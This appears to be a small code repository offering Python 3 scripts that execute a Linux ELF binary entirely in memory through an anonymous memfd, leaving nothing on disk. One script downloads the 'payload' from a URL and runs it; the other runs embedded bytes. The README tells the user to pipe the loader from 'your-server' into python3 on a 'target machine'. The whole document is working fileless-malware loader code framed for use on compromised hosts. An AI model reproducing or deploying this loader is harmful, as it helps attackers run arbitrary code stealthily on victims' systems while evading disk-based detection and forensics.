├── README.md
├── download_exec_elf_in_memory.py
└── exec_elf_in_memory.py


/README.md:
--------------------------------------------------------------------------------
 1 | # elf-in-memory-exec
 2 | 
 3 | ### Introduction
 4 | 
 5 | Python3 scripts that executes an elf (linux executable format) completely in memory, nothing is written in disk. All you need is python3 on your host to run it. There are two scripts for two use cases:
 6 | 
 7 | - `download_exec_elf_in_memory.py` : Download and execute an elf in memory (payload url must be provided; staged)
 8 | - `exec_elf_in_memory.py` : Execute an elf in memory (payload is embedded in the script itself; unstaged)
 9 | 
10 | ### Usage
11 | 
12 | **First**, modify the script on your machine, set the necessary inputs under the `#MAIN CODE` section for whichever script you use. Follow the comments in the code.
13 | 
14 | **Second**, on target machine, as an example, run:
15 | 
16 | ```
17 | curl http://your-server/exec_elf_in_memory.py | python3
18 | ```
19 | 


--------------------------------------------------------------------------------
/download_exec_elf_in_memory.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | import os
 4 | from random import choice
 5 | from string import ascii_lowercase
 6 | from urllib import request,error
 7 | 
 8 | def createFd():
 9 |     print("Creating anonymous fd")
10 |     s = ""
11 |     for _ in range(7):
12 |         s += choice(ascii_lowercase)
13 | 
14 |     fd = os.memfd_create(s,0)
15 |     if fd == -1:
16 |         print("Error in creating fd")
17 |         exit(0)
18 |     return fd
19 | 
20 | def getFileFromUrl(url):
21 |     print("Downloading contents from url")
22 |     try:
23 |         r = request.urlopen(url)
24 |         c = r.read()
25 |         r.close()
26 |         if r.msg != 'OK':
27 |             print("Error connecting to url")
28 |             exit()
29 |         return c
30 |     except error.URLError as e:
31 |         print("Download error; " + e.reason)
32 |         exit()
33 | 
34 | def writeToFile(fd,c):
35 |     print("Writing contents to anonymous file")
36 |     with open("/proc/self/fd/{}".format(fd),'wb') as f:
37 |         f.write(c)
38 | 
39 | def execAnonFile(fd,args,wait_for_proc_terminate):
40 |     print("Spawning process...")
41 |     child_pid = os.fork()
42 |     if child_pid == -1:
43 |         print("Error spawning new process")
44 |         exit()
45 |     elif child_pid == 0:
46 |         print("[+] Executing...")
47 |         fname = "/proc/self/fd/{}".format(fd)
48 |         args.insert(0,fname)
49 |         os.execve(fname,args,dict(os.environ))        
50 |     else:
51 |         if wait_for_proc_terminate:
52 |             print("Waiting for new process ({}) to terminate".format(child_pid))
53 |             os.waitpid(child_pid,0)
54 |         else:
55 |             print("New process is now orphaned")
56 | 
57 | # MAIN CODE
58 | url = "" # To download elf from; format: http://your-server/your_elf
59 | args = [] # List of arguments to pass to program; format: ["arg1","arg2",...], leave it empty for no arguments.
60 | wait_for_proc_terminate = True # Wait for new spawned process to terminate
61 | 
62 | try:
63 |     fd = createFd()
64 |     contents = getFileFromUrl(url)
65 |     writeToFile(fd,contents)
66 |     execAnonFile(fd,args,wait_for_proc_terminate)
67 | except KeyboardInterrupt:
68 |     print("User interrupted!")


--------------------------------------------------------------------------------
/exec_elf_in_memory.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | import os
 4 | from random import choice
 5 | from string import ascii_lowercase
 6 | from urllib import request,error
 7 | 
 8 | def createFd():
 9 |     print("Creating anonymous fd")
10 |     s = ""
11 |     for _ in range(7):
12 |         s += choice(ascii_lowercase)
13 | 
14 |     fd = os.memfd_create(s,0)
15 |     if fd == -1:
16 |         print("Error in creating fd")
17 |         exit(0)
18 |     return fd
19 | 
20 | def writeToFile(fd,c):
21 |     print("Writing contents to anonymous file")
22 |     with open("/proc/self/fd/{}".format(fd),'wb') as f:
23 |         f.write(c)
24 | 
25 | def execAnonFile(fd,args,wait_for_proc_terminate):
26 |     print("Spawning process...")
27 |     child_pid = os.fork()
28 |     if child_pid == -1:
29 |         print("Error spawning new process")
30 |         exit()
31 |     elif child_pid == 0:
32 |         print("[+] Executing...")
33 |         fname = "/proc/self/fd/{}".format(fd)
34 |         args.insert(0,fname)
35 |         os.execve(fname,args,dict(os.environ))        
36 |     else:
37 |         if wait_for_proc_terminate:
38 |             print("Waiting for new process ({}) to terminate".format(child_pid))
39 |             os.waitpid(child_pid,0)
40 |         else:
41 |             print("New process is now orphaned")
42 | 
43 | # MAIN CODE
44 | elf_contents = b"" # ELF contents, format: b"\x23\x57..."
45 | args = [] # List of arguments to pass to program; format: ["arg1","arg2",...], leave it empty for no arguments.
46 | wait_for_proc_terminate = True # Wait for new spawned process to terminate
47 | 
48 | try:
49 |     fd = createFd()
50 |     writeToFile(fd,elf_contents)
51 |     execAnonFile(fd,args,wait_for_proc_terminate)
52 | except KeyboardInterrupt:
53 |     print("User interrupted!")


--------------------------------------------------------------------------------